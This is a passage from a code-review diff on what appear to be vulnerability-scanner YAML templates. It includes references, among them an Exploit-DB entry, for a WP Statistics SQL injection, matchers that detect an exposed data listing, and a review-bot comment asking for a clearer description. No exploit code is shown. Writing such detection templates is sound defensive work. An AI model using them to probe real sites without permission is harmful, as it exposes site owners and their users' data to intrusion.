- https://www.exploit-db.com/exploits/49894
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wp-statistics-sql-injection-13-0-7/
- https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
- https://wordpress.org/plugins/wp-statistics/
reference:
- https://www.exploit-db.com/exploits/49894
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wp-statistics-sql-injection-13-0-7/
- https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
- https://wordpress.org/plugins/wp-statistics/
metadata:
verified: true
max-request: 1

View File

@ -5,7 +5,7 @@ info:
author: r3Y3r53
severity: medium
description: |
Security misconfiguration is a common security issue that occurs when a system, application, or network is not properly configured to protect against threats and vulnerabilities.
Security misconfiguration is a common security issue that occurs when a system, application, or network is not properly configured to protect against threats and vulnerabilities.
reference:
- https://cxsecurity.com/issue/WLB-2021010145
- https://www.exploitalert.com/view-details.html?id=36983
@ -24,7 +24,7 @@ http:
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Name") && contains(body, "CategoriesTags") && contains(body, "email")'
- 'status_code == 200'
- 'contains(body, "Name") && contains(body, "CategoriesTags") && contains(body, "email")'
- 'contains(content_type, "text/html")'
condition: and
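Review bot: same issue as the SHOOWBIZ template: the description is a textbook definition of "security misconfiguration" rather than a statement of what this template detects. The matcher below looks for `Name`, `CategoriesTags` and `email` in an HTML response, i.e. an exposed data listing; say what is exposed, on which path and in which product, so an analyst can judge the finding. The reordering of the DSL conditions has no effect under `condition: and`.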